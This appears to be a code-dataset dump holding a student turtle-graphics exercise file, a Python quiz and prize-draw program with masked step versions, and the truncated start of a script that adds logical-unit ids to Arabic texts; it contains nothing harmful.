"step-5": "from turtle import *\nfrom shapes import *\n#1-\n #1.triangle\ndef eTriangle():\n forward(100)\n right(120)\n forward(100)\n right(120)\n forward(100)\n right(120)\n mainloop()\n #2.square\ndef square():\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n mainloop()\n #3.pentagon\ndef pentagon():\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n mainloop()\n #4.hexagon\ndef hexagon():\n forward(100)\n right(60)\n forward(100)\n right(60)\n forward(100)\n right(60)\n forward(100)\n right(60)\n forward(100)\n right(60)\n forward(100)\n mainloop()\n #5.octagon\ndef octagon():\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n mainloop()\n #6.star\ndef star():\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n mainloop()\n #7.circle\ndef circle():\n for i in range(370):\n forward(2)\n right(1)\n mainloop()\n\n#2- \nfrom shapes import *\neTriangle()\nsquare()\npentagon()\nhexagon()\noctagon()\nstar()\ncircle()\nmainloop()\n\n#3- \nbgcolor(\"MidnightBlue\")\nstarp(20, True, \"yellow\", \"MidnightBlue\")\nright (20)\nforward(100)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\nright (30)\nforward(150)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\nright (40)\nforward(200)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\nright (50)\nforward(250)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\nright (60)\nforward(300)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\n\nforward(100)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\n\nforward(100)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\n\nleft (90)\nforward(300)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\nright (50)\nforward (300)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\nright(50)\nforward(300)\n\nstarp(20, True, \"yellow\", \"MidnightBlue\")\n\nright (50)\n\nforward (275)\n\ncirclep(3, True, \"SlateGrey\", \"MidnightBlue\")\nright(60)\nforward(20)\n\n\n\nmainloop()\n\n\n#4- \nbgcolor(\"skyblue\")\nright(90)\npenup()\nforward(100)\nright(90)\nforward(200)\n\nfillcolor(\"Green\")\nbegin_fill()\nforward (300)\nleft(90)\nforward (300)\nleft(90)\nforward(1250)\nleft(90)\nforward(300)\nleft(90)\nforward(1000)\nend_fill()\n\nright (90)\n\npendown()\nrectangle(200, 450, True, \"Red\")\nleft(180)\nforward(200)\nleft(90)\npenup()\nforward(100)\nright(90)\npendown\nrectangle(50, 100, True, \"Brown\")\n\npenup()\nright(90)\nforward(50)\nright(90)\nforward(50)\nright (90)\nforward(10)\n\ncircle(.1, True, \"Black\")\n\npenup()\nforward(40)\nleft(90)\nforward(50)\n\npendown()\nfillcolor(\"grey\")\nbegin_fill()\nleft (20)\nforward(400)\nleft (75)\nforward(50)\nleft(105)\nforward(400)\nleft(75)\nforward(50)\nend_fill()\n\nright(5)\npenup()\nforward(200)\nright(90)\nforward(200)\nright(90)\nleft(40)\npendown()\nfillcolor(\"brown\")\nbegin_fill()\nforward(293.717)\nright(80)\nforward(293.717)\nright(140)\nforward(450)\nend_fill()\n\npenup()\nleft(90)\nforward(75)\nleft(90)\nforward(75)\npendown()\nsquare(50, True, \"blue\", \"Black\")\nright(90)\nsquare(25, False, \"blue\", \"black\")\nright(90)\nforward(50)\nright(90)\nforward(25)\nsquare(25, False, \"blue\", \"black\")\n\npenup()\nleft(90)\nforward(25)\nright(90)\nforward(200)\npendown()\nsquare(50, True, \"blue\", \"Black\")\nright(90)\nsquare(25, False, \"blue\", \"black\")\nright(90)\nforward(50)\nright(90)\nforward(25)\nsquare(25, False, \"blue\", \"black\")\n\npenup()\nleft(90)\nforward(250)\nleft (90)\nforward(400)\n\ncirclep(3, True, \"yellow\", \"yellow\")\nmainloop()\n\n#5- \n\ndef door():\n rectangle(50, 100, True, \"Brown\")\n penup()\n right(90)\n forward(50)\n right(90)\n forward(50)\n right (90)\n forward(10)\n\n circle(.1, True, \"Black\")\n\n\ndef grass():\n fillcolor(\"Green\")\n begin_fill()\n forward (300)\n left(90)\n forward (300)\n left(90)\n forward(1250)\n left(90)\n forward(300)\n left(90)\n forward(1000)\n end_fill()\n\ndef house():\n rectangle(200, 450, True, \"Red\")\n \n\ndef roof():\n fillcolor(\"brown\")\n begin_fill()\n forward(293.717)\n right(80)\n forward(293.717)\n right(140)\n forward(450)\n end_fill()\n\ndef window():\n square(50, True, \"blue\", \"Black\")\n right(90)\n square(25, False, \"blue\", \"black\")\n right(90)\n forward(50)\n right(90)\n forward(25)\n square(25, False, \"blue\", \"black\")\n\ndef sun():\n circlep(3, True, \"yellow\", \"yellow\")\n\ndef sidewalk():\n fillcolor(\"grey\")\n begin_fill()\n left (20)\n forward(400)\n left (75)\n forward(50)\n left(105)\n forward(400)\n left(75)\n forward(50)\n end_fill()\n\n\n\n\n\n\n\n\nbgcolor(\"skyblue\")\nright(90)\npenup()\nforward(100)\nright(90)\nforward(200)\n\ngrass()\n\nright (90)\npendown()\n\nhouse()\n\nleft(180)\nforward(200)\nleft(90)\npenup()\nforward(100)\nright(90)\npendown\n\ndoor()\n\npenup()\nforward(40)\nleft(90)\nforward(50)\npendown()\n\nsidewalk()\n\nright(5)\npenup()\nforward(200)\nright(90)\nforward(200)\nright(90)\nleft(40)\npendown()\n\nroof()\n\npenup()\nleft(90)\nforward(75)\nleft(90)\nforward(75)\n\npendown()\n\nwindow()\n\npenup()\nleft(90)\nforward(25)\nright(90)\nforward(200)\npendown()\n\nwindow()\n\npenup()\nleft(90)\nforward(250)\nleft (90)\nforward(400)\n\nsun()\nmainloop()\n\n#6- \nimport random\n\ndef craystar():\n color('red', 'yellow')\n begin_fill()\n for i in range(36):\n forward(200)\n left(170)\n end_fill() \n\ndef craytriangle():\n color('black', 'blue')\n begin_fill()\n i = 60\n \n while i > 0:\n forward(i)\n right(120)\n i -= 5\n end_fill()\n\ndef craysquare():\n color(\"green\", \"Blue\")\n begin_fill()\n for i in range(12):\n for i in range(4):\n forward(60)\n right(90)\n for i in range(12):\n forward (random.randint(1,60))\n right(90)\n end_fill()\n\n\ncraysquare()\nforward (50)\ncraysquare()\nforward (50)\ncraysquare()\nforward (50)\ncraystar()\nforward(random.randint(1,100))\nright(random.randint(1, 90))\ncraytriangle()\nforward(random.randint(1,100))\nright(random.randint(1, 90))\ncraystar()\nforward(random.randint(1,100))\nright(random.randint(1, 90))\ncraytriangle()\nforward(random.randint(1,100))\nright(random.randint(1, 90))\ncraystar()\nforward(random.randint(1,100))\nright(random.randint(1, 90))\ncraytriangle()\nmainloop()",
"step-ids": [
8,
10,
12,
14,
20
]
}
|
[
8,
10,
12,
14,
20
] |
# import os,sys
# BASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# sys.path.append(BASE_DIR)
from lib import common
from conf import settings
import random
import pickle
import os
import xlrd
import time
class Base:
def save(self):
file_path=r'%s/%s' %(self.DB_PATH,self.id)
pickle.dump(self,open(file_path,'wb'))
@classmethod
def get_obj_by_id(cls,id):
file_path=r'%s/%s' %(cls.DB_PATH,id)
return pickle.load(open(file_path,'rb'))
class Subject(Base):
DB_PATH=settings.QUESTION_PATH
def __init__(self,type,comment,choice,right_res,score=5):
self.id=common.create_id()
self.type=type
self.comment=comment
self.choice=choice
self.right_res=right_res
self.score=score
@classmethod
def create_from_file(cls,src_file):
data=xlrd.open_workbook(src_file)
table=data.sheets()[0]
subject={
'type':None,
'comment':None,
'choice':[],
'res':set(),
}
for i in range(2,table.nrows):
row=table.row_values(i)
if len(subject['choice'])==4:
obj=cls(
subject['type'],
subject['comment'],
subject['choice'],
subject['res']
)
obj.save()
subject={
'type':None,
'comment':None,
'choice':[],
'res':set()
}
if row[0]:
subject['type']=row[0]
subject['comment']=row[1]
else:
subject.setdefault('choice').append(row[2])
if row[3] == 1:
res_str=row[2].strip()
res=res_str[0].upper()
subject['res'].add(res)
else:
obj=cls(
subject['type'],
subject['comment'],
subject['choice'],
subject['res']
)
obj.save()
@classmethod
def filter_question(cls):
id_l=os.listdir(settings.QUESTION_PATH)
r_id_l=random.sample(id_l,3)
return [cls.get_obj_by_id(id) for id in r_id_l]
def __str__(self):
return '<type: %s comment: %s>' %(self.type,self.comment)
class Customer(Base):
DB_PATH=settings.CUSTOMER_PATH
def __init__(self,name,sex,age,phone):
self.id=common.create_id()
self.name=name
self.sex=sex
self.age=age
self.phone=phone
class Record(Base):
DB_PATH=settings.RECORD_PATH
def __init__(self,customer_id,record_list,total_score):
self.id=common.create_id()
self.customer_id=customer_id
self.record_list=record_list
self.total_score=total_score
self.sub_time=time.strftime('%Y-%m-%d %X')
@classmethod
def get_obj_by_phone(cls,phone):
records=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))
for record in records:
customer_obj=Customer.get_obj_by_id(record.customer_id)
if phone == customer_obj.phone:
return record
class Prize(Base):
DB_PATH=settings.PRIZE_PATH
def __init__(self,name):
self.id=common.create_id()
self.name=name
@classmethod
def create_prize(cls):
while True:
name=input('奖品名: ').strip()
if not name:continue
obj=Prize(name)
obj.save()
choice=input('继续(Y/N)?: ').strip()
if choice == 'N' or choice == 'n':
break
@classmethod
def get_obj_by_name(cls,name):
prizes=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))
for prize in prizes:
if prize.name == name:
return prize
def __str__(self):
return '<%s>' %self.name
class Customer2Prize(Base):
DB_PATH=settings.C2P_PATH
def __init__(self,customer_id,prize_id):
self.id=common.create_id()
self.customer_id=customer_id
self.prize_id=prize_id
@classmethod
def get_obj_by_customer_id(cls,customer_id):
prizes=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))
for prize in prizes:
if prize.customer_id == customer_id:
return prize
@classmethod
def draw_prize(cls,customer_id):
'''
奖品概率:
0/100 欧洲十国游
1/100 iphone7 plus
10/100 mac电脑
50/100 珍藏版alex写真集一套
39/100 egon签名一个
'''
num=random.randint(1,100)
if num == 1:
# 1/100 iphone7 plus
prize_name='欧洲十国游'
if num >1 and num <=11:
# mac电脑
prize_name='mac电脑'
if num > 11 and num <=61:
# 珍藏版alex写真集一套
prize_name='珍藏版alex写真集一套'
if num > 61:
# egon签名一个
prize_name='egon签名一个'
prize=Prize.get_obj_by_name(prize_name)
obj=cls(customer_id,prize.id)
obj.save()
return prize_name
if __name__ == '__main__':
# Subject.create_from_file(r'/Users/jieli/PycharmProjects/爬虫/t1/AnswerSys/test.xlsx')
# res=Subject.filter_question()
# for i in res:
# print(i)
Prize.create_prize()
|
normal
|
{
"blob_id": "7cd6a8a106c21e8e377666d584e19d30c607b7d2",
"index": 9345,
"step-1": "<mask token>\n\n\nclass Subject(Base):\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def filter_question(cls):\n id_l = os.listdir(settings.QUESTION_PATH)\n r_id_l = random.sample(id_l, 3)\n return [cls.get_obj_by_id(id) for id in r_id_l]\n\n def __str__(self):\n return '<type: %s comment: %s>' % (self.type, self.comment)\n\n\nclass Customer(Base):\n DB_PATH = settings.CUSTOMER_PATH\n\n def __init__(self, name, sex, age, phone):\n self.id = common.create_id()\n self.name = name\n self.sex = sex\n self.age = age\n self.phone = phone\n\n\nclass Record(Base):\n DB_PATH = settings.RECORD_PATH\n\n def __init__(self, customer_id, record_list, total_score):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.record_list = record_list\n self.total_score = total_score\n self.sub_time = time.strftime('%Y-%m-%d %X')\n\n @classmethod\n def get_obj_by_phone(cls, phone):\n records = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for record in records:\n customer_obj = Customer.get_obj_by_id(record.customer_id)\n if phone == customer_obj.phone:\n return record\n\n\nclass Prize(Base):\n DB_PATH = settings.PRIZE_PATH\n\n def __init__(self, name):\n self.id = common.create_id()\n self.name = name\n\n @classmethod\n def create_prize(cls):\n while True:\n name = input('奖品名: ').strip()\n if not name:\n continue\n obj = Prize(name)\n obj.save()\n choice = input('继续(Y/N)?: ').strip()\n if choice == 'N' or choice == 'n':\n break\n\n @classmethod\n def get_obj_by_name(cls, name):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.name == name:\n return prize\n\n def __str__(self):\n return '<%s>' % self.name\n\n\nclass Customer2Prize(Base):\n DB_PATH = settings.C2P_PATH\n\n def __init__(self, customer_id, prize_id):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.prize_id = prize_id\n\n @classmethod\n def get_obj_by_customer_id(cls, customer_id):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.customer_id == customer_id:\n return prize\n\n @classmethod\n def draw_prize(cls, customer_id):\n \"\"\"\n 奖品概率:\n 0/100 欧洲十国游\n 1/100 iphone7 plus\n 10/100 mac电脑\n 50/100 珍藏版alex写真集一套\n 39/100 egon签名一个\n \"\"\"\n num = random.randint(1, 100)\n if num == 1:\n prize_name = '欧洲十国游'\n if num > 1 and num <= 11:\n prize_name = 'mac电脑'\n if num > 11 and num <= 61:\n prize_name = '珍藏版alex写真集一套'\n if num > 61:\n prize_name = 'egon签名一个'\n prize = Prize.get_obj_by_name(prize_name)\n obj = cls(customer_id, prize.id)\n obj.save()\n return prize_name\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Subject(Base):\n <mask token>\n\n def __init__(self, type, comment, choice, right_res, score=5):\n self.id = common.create_id()\n self.type = type\n self.comment = comment\n self.choice = choice\n self.right_res = right_res\n self.score = score\n\n @classmethod\n def create_from_file(cls, src_file):\n data = xlrd.open_workbook(src_file)\n table = data.sheets()[0]\n subject = {'type': None, 'comment': None, 'choice': [], 'res': set()}\n for i in range(2, table.nrows):\n row = table.row_values(i)\n if len(subject['choice']) == 4:\n obj = cls(subject['type'], subject['comment'], subject[\n 'choice'], subject['res'])\n obj.save()\n subject = {'type': None, 'comment': None, 'choice': [],\n 'res': set()}\n if row[0]:\n subject['type'] = row[0]\n subject['comment'] = row[1]\n else:\n subject.setdefault('choice').append(row[2])\n if row[3] == 1:\n res_str = row[2].strip()\n res = res_str[0].upper()\n subject['res'].add(res)\n else:\n obj = cls(subject['type'], subject['comment'], subject['choice'\n ], subject['res'])\n obj.save()\n\n @classmethod\n def filter_question(cls):\n id_l = os.listdir(settings.QUESTION_PATH)\n r_id_l = random.sample(id_l, 3)\n return [cls.get_obj_by_id(id) for id in r_id_l]\n\n def __str__(self):\n return '<type: %s comment: %s>' % (self.type, self.comment)\n\n\nclass Customer(Base):\n DB_PATH = settings.CUSTOMER_PATH\n\n def __init__(self, name, sex, age, phone):\n self.id = common.create_id()\n self.name = name\n self.sex = sex\n self.age = age\n self.phone = phone\n\n\nclass Record(Base):\n DB_PATH = settings.RECORD_PATH\n\n def __init__(self, customer_id, record_list, total_score):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.record_list = record_list\n self.total_score = total_score\n self.sub_time = time.strftime('%Y-%m-%d %X')\n\n @classmethod\n def get_obj_by_phone(cls, phone):\n records = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for record in records:\n customer_obj = Customer.get_obj_by_id(record.customer_id)\n if phone == customer_obj.phone:\n return record\n\n\nclass Prize(Base):\n DB_PATH = settings.PRIZE_PATH\n\n def __init__(self, name):\n self.id = common.create_id()\n self.name = name\n\n @classmethod\n def create_prize(cls):\n while True:\n name = input('奖品名: ').strip()\n if not name:\n continue\n obj = Prize(name)\n obj.save()\n choice = input('继续(Y/N)?: ').strip()\n if choice == 'N' or choice == 'n':\n break\n\n @classmethod\n def get_obj_by_name(cls, name):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.name == name:\n return prize\n\n def __str__(self):\n return '<%s>' % self.name\n\n\nclass Customer2Prize(Base):\n DB_PATH = settings.C2P_PATH\n\n def __init__(self, customer_id, prize_id):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.prize_id = prize_id\n\n @classmethod\n def get_obj_by_customer_id(cls, customer_id):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.customer_id == customer_id:\n return prize\n\n @classmethod\n def draw_prize(cls, customer_id):\n \"\"\"\n 奖品概率:\n 0/100 欧洲十国游\n 1/100 iphone7 plus\n 10/100 mac电脑\n 50/100 珍藏版alex写真集一套\n 39/100 egon签名一个\n \"\"\"\n num = random.randint(1, 100)\n if num == 1:\n prize_name = '欧洲十国游'\n if num > 1 and num <= 11:\n prize_name = 'mac电脑'\n if num > 11 and num <= 61:\n prize_name = '珍藏版alex写真集一套'\n if num > 61:\n prize_name = 'egon签名一个'\n prize = Prize.get_obj_by_name(prize_name)\n obj = cls(customer_id, prize.id)\n obj.save()\n return prize_name\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Subject(Base):\n DB_PATH = settings.QUESTION_PATH\n\n def __init__(self, type, comment, choice, right_res, score=5):\n self.id = common.create_id()\n self.type = type\n self.comment = comment\n self.choice = choice\n self.right_res = right_res\n self.score = score\n\n @classmethod\n def create_from_file(cls, src_file):\n data = xlrd.open_workbook(src_file)\n table = data.sheets()[0]\n subject = {'type': None, 'comment': None, 'choice': [], 'res': set()}\n for i in range(2, table.nrows):\n row = table.row_values(i)\n if len(subject['choice']) == 4:\n obj = cls(subject['type'], subject['comment'], subject[\n 'choice'], subject['res'])\n obj.save()\n subject = {'type': None, 'comment': None, 'choice': [],\n 'res': set()}\n if row[0]:\n subject['type'] = row[0]\n subject['comment'] = row[1]\n else:\n subject.setdefault('choice').append(row[2])\n if row[3] == 1:\n res_str = row[2].strip()\n res = res_str[0].upper()\n subject['res'].add(res)\n else:\n obj = cls(subject['type'], subject['comment'], subject['choice'\n ], subject['res'])\n obj.save()\n\n @classmethod\n def filter_question(cls):\n id_l = os.listdir(settings.QUESTION_PATH)\n r_id_l = random.sample(id_l, 3)\n return [cls.get_obj_by_id(id) for id in r_id_l]\n\n def __str__(self):\n return '<type: %s comment: %s>' % (self.type, self.comment)\n\n\nclass Customer(Base):\n DB_PATH = settings.CUSTOMER_PATH\n\n def __init__(self, name, sex, age, phone):\n self.id = common.create_id()\n self.name = name\n self.sex = sex\n self.age = age\n self.phone = phone\n\n\nclass Record(Base):\n DB_PATH = settings.RECORD_PATH\n\n def __init__(self, customer_id, record_list, total_score):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.record_list = record_list\n self.total_score = total_score\n self.sub_time = time.strftime('%Y-%m-%d %X')\n\n @classmethod\n def get_obj_by_phone(cls, phone):\n records = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for record in records:\n customer_obj = Customer.get_obj_by_id(record.customer_id)\n if phone == customer_obj.phone:\n return record\n\n\nclass Prize(Base):\n DB_PATH = settings.PRIZE_PATH\n\n def __init__(self, name):\n self.id = common.create_id()\n self.name = name\n\n @classmethod\n def create_prize(cls):\n while True:\n name = input('奖品名: ').strip()\n if not name:\n continue\n obj = Prize(name)\n obj.save()\n choice = input('继续(Y/N)?: ').strip()\n if choice == 'N' or choice == 'n':\n break\n\n @classmethod\n def get_obj_by_name(cls, name):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.name == name:\n return prize\n\n def __str__(self):\n return '<%s>' % self.name\n\n\nclass Customer2Prize(Base):\n DB_PATH = settings.C2P_PATH\n\n def __init__(self, customer_id, prize_id):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.prize_id = prize_id\n\n @classmethod\n def get_obj_by_customer_id(cls, customer_id):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.customer_id == customer_id:\n return prize\n\n @classmethod\n def draw_prize(cls, customer_id):\n \"\"\"\n 奖品概率:\n 0/100 欧洲十国游\n 1/100 iphone7 plus\n 10/100 mac电脑\n 50/100 珍藏版alex写真集一套\n 39/100 egon签名一个\n \"\"\"\n num = random.randint(1, 100)\n if num == 1:\n prize_name = '欧洲十国游'\n if num > 1 and num <= 11:\n prize_name = 'mac电脑'\n if num > 11 and num <= 61:\n prize_name = '珍藏版alex写真集一套'\n if num > 61:\n prize_name = 'egon签名一个'\n prize = Prize.get_obj_by_name(prize_name)\n obj = cls(customer_id, prize.id)\n obj.save()\n return prize_name\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Base:\n\n def save(self):\n file_path = '%s/%s' % (self.DB_PATH, self.id)\n pickle.dump(self, open(file_path, 'wb'))\n\n @classmethod\n def get_obj_by_id(cls, id):\n file_path = '%s/%s' % (cls.DB_PATH, id)\n return pickle.load(open(file_path, 'rb'))\n\n\nclass Subject(Base):\n DB_PATH = settings.QUESTION_PATH\n\n def __init__(self, type, comment, choice, right_res, score=5):\n self.id = common.create_id()\n self.type = type\n self.comment = comment\n self.choice = choice\n self.right_res = right_res\n self.score = score\n\n @classmethod\n def create_from_file(cls, src_file):\n data = xlrd.open_workbook(src_file)\n table = data.sheets()[0]\n subject = {'type': None, 'comment': None, 'choice': [], 'res': set()}\n for i in range(2, table.nrows):\n row = table.row_values(i)\n if len(subject['choice']) == 4:\n obj = cls(subject['type'], subject['comment'], subject[\n 'choice'], subject['res'])\n obj.save()\n subject = {'type': None, 'comment': None, 'choice': [],\n 'res': set()}\n if row[0]:\n subject['type'] = row[0]\n subject['comment'] = row[1]\n else:\n subject.setdefault('choice').append(row[2])\n if row[3] == 1:\n res_str = row[2].strip()\n res = res_str[0].upper()\n subject['res'].add(res)\n else:\n obj = cls(subject['type'], subject['comment'], subject['choice'\n ], subject['res'])\n obj.save()\n\n @classmethod\n def filter_question(cls):\n id_l = os.listdir(settings.QUESTION_PATH)\n r_id_l = random.sample(id_l, 3)\n return [cls.get_obj_by_id(id) for id in r_id_l]\n\n def __str__(self):\n return '<type: %s comment: %s>' % (self.type, self.comment)\n\n\nclass Customer(Base):\n DB_PATH = settings.CUSTOMER_PATH\n\n def __init__(self, name, sex, age, phone):\n self.id = common.create_id()\n self.name = name\n self.sex = sex\n self.age = age\n self.phone = phone\n\n\nclass Record(Base):\n DB_PATH = settings.RECORD_PATH\n\n def __init__(self, customer_id, record_list, total_score):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.record_list = record_list\n self.total_score = total_score\n self.sub_time = time.strftime('%Y-%m-%d %X')\n\n @classmethod\n def get_obj_by_phone(cls, phone):\n records = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for record in records:\n customer_obj = Customer.get_obj_by_id(record.customer_id)\n if phone == customer_obj.phone:\n return record\n\n\nclass Prize(Base):\n DB_PATH = settings.PRIZE_PATH\n\n def __init__(self, name):\n self.id = common.create_id()\n self.name = name\n\n @classmethod\n def create_prize(cls):\n while True:\n name = input('奖品名: ').strip()\n if not name:\n continue\n obj = Prize(name)\n obj.save()\n choice = input('继续(Y/N)?: ').strip()\n if choice == 'N' or choice == 'n':\n break\n\n @classmethod\n def get_obj_by_name(cls, name):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.name == name:\n return prize\n\n def __str__(self):\n return '<%s>' % self.name\n\n\nclass Customer2Prize(Base):\n DB_PATH = settings.C2P_PATH\n\n def __init__(self, customer_id, prize_id):\n self.id = common.create_id()\n self.customer_id = customer_id\n self.prize_id = prize_id\n\n @classmethod\n def get_obj_by_customer_id(cls, customer_id):\n prizes = (cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.customer_id == customer_id:\n return prize\n\n @classmethod\n def draw_prize(cls, customer_id):\n \"\"\"\n 奖品概率:\n 0/100 欧洲十国游\n 1/100 iphone7 plus\n 10/100 mac电脑\n 50/100 珍藏版alex写真集一套\n 39/100 egon签名一个\n \"\"\"\n num = random.randint(1, 100)\n if num == 1:\n prize_name = '欧洲十国游'\n if num > 1 and num <= 11:\n prize_name = 'mac电脑'\n if num > 11 and num <= 61:\n prize_name = '珍藏版alex写真集一套'\n if num > 61:\n prize_name = 'egon签名一个'\n prize = Prize.get_obj_by_name(prize_name)\n obj = cls(customer_id, prize.id)\n obj.save()\n return prize_name\n\n\n<mask token>\n",
"step-5": "# import os,sys\n# BASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n# sys.path.append(BASE_DIR)\n\nfrom lib import common\nfrom conf import settings\nimport random\nimport pickle\nimport os\nimport xlrd\nimport time\n\nclass Base:\n def save(self):\n file_path=r'%s/%s' %(self.DB_PATH,self.id)\n pickle.dump(self,open(file_path,'wb'))\n\n @classmethod\n def get_obj_by_id(cls,id):\n file_path=r'%s/%s' %(cls.DB_PATH,id)\n return pickle.load(open(file_path,'rb'))\n\nclass Subject(Base):\n DB_PATH=settings.QUESTION_PATH\n def __init__(self,type,comment,choice,right_res,score=5):\n self.id=common.create_id()\n self.type=type\n self.comment=comment\n self.choice=choice\n self.right_res=right_res\n self.score=score\n\n\n @classmethod\n def create_from_file(cls,src_file):\n data=xlrd.open_workbook(src_file)\n table=data.sheets()[0]\n subject={\n 'type':None,\n 'comment':None,\n 'choice':[],\n 'res':set(),\n }\n for i in range(2,table.nrows):\n row=table.row_values(i)\n if len(subject['choice'])==4:\n obj=cls(\n subject['type'],\n subject['comment'],\n subject['choice'],\n subject['res']\n )\n obj.save()\n subject={\n 'type':None,\n 'comment':None,\n 'choice':[],\n 'res':set()\n }\n if row[0]:\n subject['type']=row[0]\n subject['comment']=row[1]\n else:\n subject.setdefault('choice').append(row[2])\n if row[3] == 1:\n res_str=row[2].strip()\n res=res_str[0].upper()\n subject['res'].add(res)\n\n else:\n obj=cls(\n subject['type'],\n subject['comment'],\n subject['choice'],\n subject['res']\n )\n obj.save()\n\n @classmethod\n def filter_question(cls):\n id_l=os.listdir(settings.QUESTION_PATH)\n r_id_l=random.sample(id_l,3)\n return [cls.get_obj_by_id(id) for id in r_id_l]\n\n def __str__(self):\n return '<type: %s comment: %s>' %(self.type,self.comment)\n\n\nclass Customer(Base):\n DB_PATH=settings.CUSTOMER_PATH\n def __init__(self,name,sex,age,phone):\n self.id=common.create_id()\n self.name=name\n self.sex=sex\n self.age=age\n self.phone=phone\n\n\nclass Record(Base):\n DB_PATH=settings.RECORD_PATH\n def __init__(self,customer_id,record_list,total_score):\n self.id=common.create_id()\n self.customer_id=customer_id\n self.record_list=record_list\n self.total_score=total_score\n self.sub_time=time.strftime('%Y-%m-%d %X')\n\n @classmethod\n def get_obj_by_phone(cls,phone):\n records=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for record in records:\n customer_obj=Customer.get_obj_by_id(record.customer_id)\n if phone == customer_obj.phone:\n return record\n\n\nclass Prize(Base):\n DB_PATH=settings.PRIZE_PATH\n def __init__(self,name):\n self.id=common.create_id()\n self.name=name\n\n @classmethod\n def create_prize(cls):\n while True:\n name=input('奖品名: ').strip()\n if not name:continue\n obj=Prize(name)\n obj.save()\n choice=input('继续(Y/N)?: ').strip()\n if choice == 'N' or choice == 'n':\n break\n\n @classmethod\n def get_obj_by_name(cls,name):\n prizes=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.name == name:\n return prize\n\n def __str__(self):\n return '<%s>' %self.name\n\nclass Customer2Prize(Base):\n DB_PATH=settings.C2P_PATH\n def __init__(self,customer_id,prize_id):\n self.id=common.create_id()\n self.customer_id=customer_id\n self.prize_id=prize_id\n\n @classmethod\n def get_obj_by_customer_id(cls,customer_id):\n prizes=(cls.get_obj_by_id(id) for id in os.listdir(cls.DB_PATH))\n for prize in prizes:\n if prize.customer_id == customer_id:\n return prize\n\n @classmethod\n def draw_prize(cls,customer_id):\n '''\n 奖品概率:\n 0/100 欧洲十国游\n 1/100 iphone7 plus\n 10/100 mac电脑\n 50/100 珍藏版alex写真集一套\n 39/100 egon签名一个\n '''\n num=random.randint(1,100)\n\n if num == 1:\n # 1/100 iphone7 plus\n prize_name='欧洲十国游'\n\n if num >1 and num <=11:\n # mac电脑\n prize_name='mac电脑'\n if num > 11 and num <=61:\n # 珍藏版alex写真集一套\n prize_name='珍藏版alex写真集一套'\n if num > 61:\n # egon签名一个\n prize_name='egon签名一个'\n prize=Prize.get_obj_by_name(prize_name)\n obj=cls(customer_id,prize.id)\n obj.save()\n return prize_name\n\nif __name__ == '__main__':\n\n # Subject.create_from_file(r'/Users/jieli/PycharmProjects/爬虫/t1/AnswerSys/test.xlsx')\n # res=Subject.filter_question()\n # for i in res:\n # print(i)\n\n Prize.create_prize()",
"step-ids": [
21,
23,
24,
27,
30
]
}
|
[
21,
23,
24,
27,
30
] |
# inserting logical unit ids for splitting texts into logical chunks
import re
import os
splitter = "#META#Header#End#"
def logical_units(file):
ar_ra = re.compile("^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$")
with open(file, "r", encoding="utf8") as f1:
book = f1.read()
# splitter test
if splitter in book:
# logical units
log_ids = re.findall("\n#\d+#", book)
if len(log_ids) > 0:
print("\tthe text already have %d logical units of this length" % len(log_ids))
pass
else:
# insert logical unit ids
new_data = []
head = book.split(splitter)[0]
text = book.split(splitter)[1]
token_count = 0
data = re.findall(r"\w+|\W+", text)
